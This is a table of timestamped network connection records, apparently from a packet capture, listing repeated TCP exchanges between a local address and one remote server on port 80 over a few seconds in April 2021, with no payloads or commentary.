                                                                                                                                          Apr 28, 2021 22:59:54.703635931 CEST4991380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:54.794023991 CEST8049912176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:54.798882961 CEST4991280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:54.799063921 CEST8049913176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:54.799278975 CEST4991380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:54.800630093 CEST4991380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:54.896241903 CEST8049913176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:54.900244951 CEST8049913176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:54.900412083 CEST4991380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.014286995 CEST4991380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.016045094 CEST4991580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.110882044 CEST8049913176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.116031885 CEST4991380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.121285915 CEST8049915176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.122577906 CEST4991580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.123074055 CEST4991580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.226834059 CEST8049915176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.230662107 CEST8049915176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.230796099 CEST4991580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.342197895 CEST4991580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.343622923 CEST4991680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.438977003 CEST8049916176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.439085007 CEST4991680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.440531969 CEST4991680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.445818901 CEST8049915176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.445898056 CEST4991580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.536878109 CEST8049916176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.539870024 CEST8049916176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.539999008 CEST4991680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.659773111 CEST4991680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.661926985 CEST4991780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.755527973 CEST8049916176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.755636930 CEST4991680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.765603065 CEST8049917176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.765732050 CEST4991780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.766356945 CEST4991780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.869962931 CEST8049917176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.873956919 CEST8049917176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:55.874119043 CEST4991780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.982955933 CEST4991780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:55.984003067 CEST4991880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.078839064 CEST8049918176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.078986883 CEST4991880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.080050945 CEST4991880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.088093996 CEST8049917176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.088164091 CEST4991780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.173161983 CEST8049918176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.176745892 CEST8049918176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.176855087 CEST4991880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.288108110 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.295027971 CEST4991880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.296355009 CEST4992080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.381623983 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.381761074 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.382097006 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.389254093 CEST8049918176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.389334917 CEST4991880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.396442890 CEST8049920176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.396584988 CEST4992080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.397057056 CEST4992080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.475706100 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.476457119 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.476610899 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.477317095 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.477356911 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.477411032 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.477526903 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.477649927 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.477727890 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.477757931 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.477823019 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.477838993 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.478379965 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.478537083 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.496830940 CEST8049920176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.502569914 CEST8049920176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.506050110 CEST4992080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.571986914 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.572025061 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.572046995 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.572068930 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.572134018 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.572154045 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.572204113 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.572267056 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.572288036 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.572303057 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.572750092 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.572773933 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.572794914 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.572818995 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.572840929 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.572938919 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.572974920 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.573430061 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.573513985 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.623261929 CEST4992080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.624367952 CEST4992180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.667160988 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.667243958 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.667292118 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.667342901 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.667383909 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.667438984 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.667454958 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.667467117 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.667594910 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.667644978 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.667685032 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.667697906 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.667737961 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.667753935 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.667788029 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.667800903 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.667843103 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.667869091 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.668462038 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.668517113 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.668551922 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.668570042 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.668615103 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.668627024 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.668675900 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.668735981 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.668744087 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.668771029 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.668880939 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.669089079 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.669253111 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.669285059 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.669414043 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.722634077 CEST8049920176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.725533962 CEST8049921176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.726803064 CEST4992180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.726874113 CEST4992080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.727222919 CEST4992180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.760603905 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.760935068 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.761077881 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.761240005 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.761265993 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.761300087 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.761331081 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.761337996 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.761400938 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.761421919 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.761466026 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.761953115 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.761977911 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.762003899 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.762029886 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.762054920 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.762579918 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.762609959 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.762634993 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.762886047 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.762911081 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.762936115 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.762960911 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.763284922 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.763309956 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.763334990 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.763360023 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.763648987 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.763674021 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.763698101 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.763722897 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.764290094 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.764319897 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.764344931 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.764372110 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.764693975 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.764719009 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.764744043 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.764769077 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.766585112 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.829622984 CEST8049921176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.833528042 CEST8049921176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.834608078 CEST4992180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.857331038 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.857368946 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.857374907 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.857413054 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.859481096 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.862267971 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.955816984 CEST8049919176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:56.956067085 CEST4991980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.958015919 CEST4992180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:56.961843967 CEST4992280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.057566881 CEST8049922176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.057616949 CEST8049921176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.057749033 CEST4992180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.057971954 CEST4992280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.058213949 CEST4992280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.157608986 CEST8049922176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.161509037 CEST8049922176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.161675930 CEST4992280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.265250921 CEST4992280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.266678095 CEST4992480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.362977028 CEST8049922176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.363107920 CEST4992280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.366067886 CEST8049924176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.366818905 CEST4992480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.366858006 CEST4992480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.463994980 CEST8049924176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.467434883 CEST8049924176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.467552900 CEST4992480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.577151060 CEST4992480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.587907076 CEST4992580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.674257040 CEST8049924176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.674365997 CEST4992480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.685877085 CEST8049925176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.686180115 CEST4992580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.686992884 CEST4992580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.786551952 CEST8049925176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.790180922 CEST8049925176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.794974089 CEST4992580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.904582977 CEST4992580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.905945063 CEST4992680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:57.998694897 CEST8049926176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:57.999119043 CEST4992680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.000787973 CEST4992680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.002443075 CEST8049925176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.002589941 CEST4992580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.095101118 CEST8049926176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.098908901 CEST8049926176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.099090099 CEST4992680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.205703974 CEST4992680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.206943989 CEST4992880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.298562050 CEST8049926176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.298674107 CEST4992680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.302385092 CEST8049928176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.302539110 CEST4992880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.303216934 CEST4992880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.399013996 CEST8049928176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.402904987 CEST8049928176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.403052092 CEST4992880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.513588905 CEST4992880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.514676094 CEST4992980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.608961105 CEST8049928176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.609091043 CEST4992880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.613074064 CEST8049929176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.613204002 CEST4992980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.614619970 CEST4992980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.713944912 CEST8049929176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.717684984 CEST8049929176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.717782974 CEST4992980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.826775074 CEST4992980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.827847004 CEST4993080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.927592039 CEST8049929176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.927712917 CEST4992980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.928052902 CEST8049930176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:58.929078102 CEST4993080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:58.929698944 CEST4993080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.027235985 CEST8049930176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.030653000 CEST8049930176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.031786919 CEST4993080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.138493061 CEST4993080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.139759064 CEST4993180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.238945961 CEST8049930176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.239049911 CEST4993080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.240073919 CEST8049931176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.240185976 CEST4993180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.240889072 CEST4993180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.341371059 CEST8049931176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.345542908 CEST8049931176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.345660925 CEST4993180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.452238083 CEST4993180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.456021070 CEST4993280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.551161051 CEST8049932176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.552530050 CEST8049931176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.552712917 CEST4993180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.553247929 CEST4993280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.553277016 CEST4993280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.648608923 CEST8049932176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.652452946 CEST8049932176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.652755022 CEST4993280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.655678988 CEST4993380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.751458883 CEST8049933176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.751595974 CEST4993380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.751935959 CEST4993380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.764219046 CEST4993280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.765314102 CEST4993480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.846127987 CEST8049933176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.846266031 CEST4993380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.846339941 CEST8049933176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.846446037 CEST4993380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.846615076 CEST8049933176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.846791029 CEST4993380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.847165108 CEST8049933176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.847323895 CEST4993380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.847604990 CEST8049933176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.847718954 CEST4993380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.847731113 CEST8049933176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.847845078 CEST4993380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.848123074 CEST8049933176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.848206043 CEST4993380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.848355055 CEST8049933176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:59.848464966 CEST4993380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 22:59:59.848633051 CEST8049933176.111.174.114192.168.2.4
